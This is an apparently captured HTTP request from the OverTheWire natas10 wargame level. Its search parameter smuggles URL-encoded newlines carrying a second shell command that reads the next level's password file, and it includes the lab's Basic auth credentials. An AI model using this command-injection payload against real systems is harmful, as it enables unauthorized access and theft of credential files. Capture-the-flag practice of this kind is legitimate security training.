GET /?needle=kulululu%0D%0Acat+%2Fetc%2Fnatas_webpass%2Fnatas11+%0D%0Als&submit=Search HTTP/1.1
Host: natas10.natas.labs.overthewire.org
Connection: keep-alive
Authorization: Basic bmF0YXMxMDpuT3BwMWlnUUFrVXphSTFHVVVqem4xYkZWajd4Q056dQ==
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://natas10.natas.labs.overthewire.org/?needle=merocat%2Fetc%2Fnatas_webpass%2Fnatas10ffff&submit=Search
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: __cfduid=d6c410b0250727b1a0cdc574dc43602d51526478824; __utmz=176859643.1526478824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176859643; __utma=176859643.1755896595.1526478824.1534727391.1534786462.72

